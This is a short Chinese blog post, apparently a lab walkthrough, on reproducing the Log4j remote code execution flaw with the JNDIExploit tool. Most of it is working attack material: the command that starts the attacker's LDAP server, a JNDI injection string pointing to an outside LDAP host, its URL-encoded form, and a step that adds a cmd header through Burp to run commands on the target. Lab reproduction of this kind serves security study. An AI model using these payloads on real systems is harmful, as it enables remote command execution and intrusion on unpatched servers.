JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

wutiangui2023-09-14 9:58

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
2501_9444241210 分钟前
Flutter for OpenHarmony游戏集合App实战之记忆翻牌配对消除
android·java·开发语言·javascript·windows·flutter·游戏
鹿角片ljp17 分钟前
Java网络编程入门:从Socket到多线程服务器
java·服务器·网络
走进IT25 分钟前
DDD项目分层结构说明
java
橙露30 分钟前
嵌入式实时操作系统 FreeRTOS:任务调度与信号量的核心应用
java·大数据·服务器
愚公移码30 分钟前
蓝凌EKP产品:关联机制浅析
java·服务器·前端
阿蒙Amon37 分钟前
C#每日面试题-is和as的区别
java·开发语言·c#
Tao____38 分钟前
适合中小企业的物联网平台
java·物联网·mqtt·低代码·开源
迷路剑客1 小时前
ES-7.10-高亮HighLight知识点总结
java·数据库·mybatis
阿蒙Amon1 小时前
C#每日面试题-简述泛型约束
java·开发语言·c#
Wpa.wk1 小时前
持续集成 - 持续集成工具-Jenkins的部署流程
java·运维·经验分享·ci/cd·自动化·jenkins
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)04AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)062025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)07Linux下V2Ray安装配置指南08BongoCat - 跨平台键盘猫动画工具09Claude Code Skills 实用使用手册10UV安装并设置国内源